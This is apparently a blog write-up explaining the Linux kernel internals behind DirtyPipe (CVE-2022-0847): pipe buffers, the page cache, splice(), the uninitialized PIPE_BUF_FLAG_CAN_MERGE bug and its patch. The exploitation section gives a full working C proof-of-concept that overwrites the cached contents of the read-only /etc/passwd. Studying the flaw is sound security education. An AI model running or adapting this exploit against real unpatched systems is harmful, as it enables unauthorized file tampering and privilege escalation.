DirtyPipe-CVE-2022-0847
by 0xnull007
One of my friends, stdnoerr
, wrote a blog about his N-day research on DirtyPipe (CVE-2022-0847). As a noob in kernel exploitation, I realized that I should be familiar with some Linux kernel internals to fully understand his blog. So I decided to explore those internals and write about my journey so others like me could benefit. This post will cover only the internals necessary to understand the DirtyPipe vulnerability and its exploitation. We’ll go through the important kernel structures in sequence and then merge them at the end to get the complete picture.
Pipe
The first and most important kernel concept/structure involved in this vulnerability is a pipe
. A pipe
is a unidirectional inter-process communication (IPC) mechanism found in UNIX-like operating systems. In essence, a pipe is a buffer in kernel space that processes access through file descriptors. You might have used it in your shell commands like:
cat /proc/cpuinfo | grep "address size"
Here, the |
operator creates a pipe (a buffer in kernel space). The output of cat
is written into this pipe, and the input of grep
is read from the same pipe. Such a pipe can be created programmatically using the syscall pipe(), which returns two file descriptors — one for reading and the other for writing.
In Linux, every file is represented by a special data structure called an inode, which stores important information about the file (such as its type, size, and permissions). Pipes in the Linux kernel are built on top of the virtual filesystem (VFS). When you create a pipe, the two file descriptors you get point to two pseudo files with different permissions — one read-only and the other write-only — but both share a single inode. This inode has a field called i_pipe, which points to a kernel structure named pipe_inode_info. This structure is what the kernel uses to manage the actual metadata of a pipe.
Key Data Structures
struct pipe_inode_info
- Tracks read/write positions, buffers, and synchronization.
bufs
: an array ofstruct pipe_buffer
, each representing a memory page storing pipe data.ring_size
: size of the arraybufs
.
struct pipe_buffer
page
: pointer tostruct page
describing where the actual data held by thepipe_buffer
is stored.offset
,len
: Track where valid data exists in the page.ops
: Operations table (pipe_buf_operations
) for managing the buffer.
Operations on a Pipe
Pipe Creation (pipe()
)
pipe()/pipe2()
syscall → do_pipe2() →__do_pipe_flags()
- Allocates a
struct pipe_inode_info
via alloc_pipe_info(). - Creates two file descriptors (read & write ends) via get_unused_fd_flags().
- Initializes 16 pipe buffers (default) as
PIPE_DEF_BUFFERS
. Note that eachpipe_buffer
has one page associated with it, which means the total capacity of the pipe isring_size * 4096
bytes. A process can get and set the size of this ring using thefcntl()
system call with theF_GETPIPE_SZ
andF_SETPIPE_SZ
flags, respectively.ring_size
is always a power of 2. That means if we set it to 3, the kernel will automatically round it up to the next power of two.
Writing to a Pipe (write()
)
write()
syscall → vfs_write() → pipe_write().- If the pipe is full, the writer sleeps until space is available.
- Kernel allocates a page (if needed) and copies data from user space.
- Updates
pipe_buffer
’s offset,len
, andflags
.
Reading from a Pipe (read()
)
read()
syscall →vfs_read()
→ pipe_read().- If the pipe is empty, the reader sleeps until data arrives.
- Kernel copies data from the
pipe_buffer
page to user space. - If the buffer is fully consumed, the page is freed or marked for reuse.
The array bufs
in struct pipe_inode_info
is a circular array (or ring buffer):
- It has a fixed size (defined by
ring_size
inpipe_inode_info
). - It uses two pointers (
head
andtail
) to track where new data is written (head
) and where data is read (tail
). - New data is written to
bufs[head % (ring_size - 1)]
andhead
is incremented. Asring_size
is always a power of 2, whenhead
reachesring_size
,head % (ring_size - 1)
wraps around to0
(hence “circular”). - When
head - tail == ring_size
, the pipe is full; new writes either wait (block) or overwrite old data (depending on configuration). - When
head == tail
, the buffer is empty; reads block until new data arrives. Here is a pictorial view of whatever is discussed so far.
Page Cache
The page cache plays an important role in the Dirty Pipe vulnerability, so let’s see what it is and how it works. The page cache is a kernel-managed memory region that stores recently accessed file data and disk blocks in RAM. It can be thought of as a caching layer for file I/O to speed it up.
According to the Linux kernel documentation:
The physical memory is volatile, and the common case for getting data into memory is to read it from files. Whenever a file is read, the data is put into the page cache to avoid expensive disk access on subsequent reads. Similarly, when one writes to a file, the data is placed in the page cache and eventually written to the backing storage device. The written pages are marked as dirty, and when Linux decides to reuse them for other purposes, it makes sure to synchronize the file contents on the device with the updated data. source
The kernel doesn’t just store recently accessed file data in the page cache—it also uses an optimization mechanism called read-ahead, which observes access patterns, predicts which pages you’ll need next, and loads them into memory in advance. So, if you are reading a file sequentially, the kernel will pre-load the remaining pages of that file into memory as well.
Because of this caching layer, if any process on the system (or the kernel itself) requests data from a file that is already cached, the cached data is used instead of accessing the disk. This default behavior can be changed by using the flags (O_DIRECT | O_SYNC
) when opening a file. However, in most situations, the cached data is what the kernel—and therefore user processes—actually use.
Whenever a file is opened, the kernel stores its metadata in struct inode. Among that metadata, there is a field named i_mapping of type struct address_space
, which contains an array of pointers to the pages in the page cache to which that file is mapped.
splice()
syscall
The splice
syscall is part of the zero-copy system calls in the Linux kernel. Zero-copy syscalls allow data to be transferred between kernel objects (such as files, sockets, and pipes) without copying the data into or out of user-space memory.
Let’s make this clearer with a scenario where we want to copy the contents of a file into a pipe. The naive approach would be to open
and read
the contents of that file into a user buffer and then write
that buffer’s contents into a pipe. The following diagram shows the steps involved in this approach:
We can see that to copy the data from a file into a pipe, we first have to copy it into a user-space buffer, which is redundant and costly. The splice
syscall eliminates this step by reusing the page cache where the file’s data is already cached. Instead of copying the data from the page cache to a user buffer, it copies the address of the page cache into the page
pointer of the pipe_buffer
. The following diagram illustrates this:
Let’s see what the man page of the splice
syscall says:
SPLICE(2) Linux Programmer's Manual
NAME
splice - splice data to/from a pipe
SYNOPSIS
#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h>
ssize_t splice(int fd_in, off64_t *off_in, int fd_out,
off64_t *off_out, size_t len, unsigned int flags);
DESCRIPTION
splice() moves data between two file descriptors without copying between
kernel address space and user address space. It transfers up to len bytes
of data from the file descriptor fd_in to the file descriptor fd_out,
where one of the file descriptors must refer to a pipe.
The following semantics apply for fd_in and off_in:
* If fd_in refers to a pipe, then off_in must be NULL.
* If fd_in does not refer to a pipe and off_in is NULL, then bytes are read
from fd_in starting from the file offset, and the file offset is adjusted
appropriately.
* If fd_in does not refer to a pipe and off_in is not NULL, then off_in must
point to a buffer specifying the starting offset from which bytes will be
read from fd_in; in this case, the file offset of fd_in is not changed.
Analogous statements apply for fd_out and off_out.
One important thing to note from the description above is that one of the two file descriptors passed to the splice
syscall must refer to a pipe. Let’s take a simple example to understand splice()
in action.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define TARGET_FILE "./f1"
int main() {
int fd;
int pipefd[2];
char buffer[256];
// 1. Create pipe and open target file
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
// 2. Splice the file
if (splice(fd, NULL, pipefd[1], NULL, sizeof(buffer), 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
read(pipefd[0], buffer, sizeof(buffer));
printf("Data read from target file: %s\n", buffer);
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 0;
}
The above code snippet opens a file f1
and splice
s it into the pipe, which then refers to the page cache of file f1
and then we can performs a read operation on pipe to read the file contents.
Writing to a Pipe
Understanding how data is written to a pipe is mandatory to understand and exploit this vulnerability. When a process writes data into a pipe, the kernel eventually calls the pipe_write()
function. This function is responsible for copying data from user space into one or more pipe buffers — the circular array that forms the core of every pipe. The pipe_write()
function begins by locating a writable slot in the pipe’s buffer array (pipe->bufs
). When there’s space, it looks at the last used pipe buffer (i.e., the tail of the circular buffer) and merges data with it. So, if there is space left in a buffer, new data will be written into it. However, this may be problematic with the zero-copy concept. As mentioned, the zero-copy operation copies the reference to the file’s page. If a page reference is copied this way, the pipe must prevent it from being modified, or it will have to copy the whole page instead of just the pointer. Why the kernel must prevent modification will become clear shortly. Thus, the normal write behavior must be modified to protect it. Therefore, a flag was introduced to specify whether new data could be written to the buffer or not.
This merge decision is made based on the following condition (simplified):
if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
// append new data into existing pipe buffer
}
The PIPE_BUF_FLAG_CAN_MERGE
flag indicates whether the existing pipe_buffer
can safely accept more data — meaning the new data can be written directly into the same underlying page without breaking isolation or corrupting shared memory.
- For anonymous pipes (normal cases), this flag is set to
1
by default. - For pipe buffers backed by a file’s page cache, this flag must be set to
0
, since those pages might be shared between multiple processes or files (read-only pages, for instance).
Now, answering the question above: suppose process A reads f1.txt
, and the file’s contents are loaded into the page cache. If process B then uses splice()
to move data from f1.txt
into a pipe without copying, the pipe buffer will point directly to the same cached page that process A populated. If process B subsequently writes into that pipe buffer, it will overwrite the shared cached page — and by extension, the actual file contents, even if that file was read-only. To protect against this, the pipe implementation uses a flag called PIPE_BUF_FLAG_CAN_MERGE
. For buffers backed by a file’s page cache, this flag must be cleared (set to 0
), which prevents future writes from being merged into that buffer.
Vulnerability
To pinpoint what went wrong, let’s trace the splice(file → pipe)
call path within the Linux kernel. The journey begins at sys_splice(), the system call entry point. It primarily resolves user-supplied file descriptors into struct fd
objects and then invokes __do_splice(), which looks up the corresponding struct pipe_inode_info
for the pipe, copies the file offset (if any) from user space into kernel space, and then calls do_splice(). do_splice()
determines the splice direction (e.g., file → pipe, pipe → file, or pipe → pipe) and dispatches to the appropriate helper function based on the source and destination types.
In the Dirty Pipe case, data is being spliced from a file to a pipe, so splice_file_to_pipe() is used. This function invokes the file’s splice_read
callback defined in its struct file_operations. For regular files, this callback points to generic_file_splice_read(), which internally calls the standard read path (read_iter()
→ generic_file_read_iter()).
generic_file_read_iter()
uses the page cache to serve reads efficiently. Inside, it calls filemap_read(), which fetches the file’s backing pages from the page cache and hands them off to copy_page_to_iter(). After performing necessary checks, execution reaches copy_page_to_iter_pipe(), where the current pipe buffer slot is obtained from the pipe’s buffer array and the page cache page is attached to it directly — without copying any data.
This means the pipe buffer now holds a reference to the same struct page
that backs the file’s page cache. The following diagram illustrates this entire flow.
In copy_page_to_iter_pipe()
function, the following code snippet is responsible for the copying of the page reference and updating the pipe_buffer
struct. One important thing to note is that the flags
member of buf
, which contains the PIPE_BUF_FLAG_CAN_MERGE
bit, isn’t initialized to 0
to prevent any future writes to this buffer.
buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;
The Dirty Pipe vulnerability occurred because copy_page_to_iter_pipe()
could leave pipe_buffer->flags
uninitialized; a stale nonzero value there could incorrectly indicate that merging was allowed, permitting writes that modified file-backed cache pages. Now, to trigger this vulnerability, we must splice into a pipe buffer whose PIPE_BUF_FLAG_CAN_MERGE
is already set. We can set this flag simply by writing into an anonymous (normal) pipe because writing to such a pipe goes through this code path, which will set that flag. Reading from it afterwards does not unset the flag.
Exploitation
To exploit this vulnerability, we need to allocate a pipe and open a file to which we have only read-only access, to test whether we can actually write to it. Before splicing that file, we must ensure that the pipe’s PIPE_BUF_FLAG_CAN_MERGE
flag is set. To set that flag, we will write to the pipe and then read from it. This drains the pipe and frees the pages, but the flag remains set.
By default, a pipe has 16
buffers and each can hold 4096
bytes. For simplicity, we can change the pipe size to reduce the number of pipe buffers to 1
, which helps us reach the goal faster. One important thing to note is that draining this single pipe buffer completely is mandatory before splicing a file into it.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
return 0;
}
Since the path to the vulnerable function copy_page_to_iter_pipe()
is via splice
and goes through splice_file_to_pipe()
, we will perform a splice
from the target file to the pipe. Because copy_page_to_iter_pipe()
will obtain the file’s cached page, the buffer’s page will be replaced with the file’s. Subsequent writes to the pipe should modify the file’s page, even though the file is read-only. The splice size will be 1
to use the smallest possible value to trigger the vulnerability.
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
At this point, the file’s cached page is being used as the pipe_buffer
’s backing page. Now, writing to the pipe should overwrite the file’s content. The following is the complete proof-of-concept.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
// 4. Overwrite the target file
write(pipefd[1], "0xnull007", 9);
lseek(fd, 0, SEEK_SET);
read(fd, buffer, 60);
buffer[60] = '\0'; // Null-terminate the buffer
printf("Data read from target file: %s\n", buffer);
return 0;
}
Limitations
DirtyPipe has a few limitations:
- It cannot overwrite the first byte.
- It cannot write more than
PAGE_SIZE - 1
bytes. - It cannot overwrite memory pages; the data to be overwritten must be on disk.
- It cannot write more contents than the file’s original size.
Patch
Now, let’s see the patch commit for this vulnerability. We can see that they initialized the flags
member to 0
in both functions where it wasn’t initialized. This means that whenever a file is spliced into the pipe, its PIPE_BUF_FLAG_CAN_MERGE
flag will be set to 0
, preventing it from being overwritten.
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
return 0;
buf->ops = &page_cache_pipe_buf_ops;
+ buf->flags = 0;
get_page(page);
buf->page = page;
buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
break;
buf->ops = &default_pipe_buf_ops;
+ buf->flags = 0;
buf->page = page;
buf->offset = 0;
buf->len = min_t(ssize_t, left, PAGE_SIZE);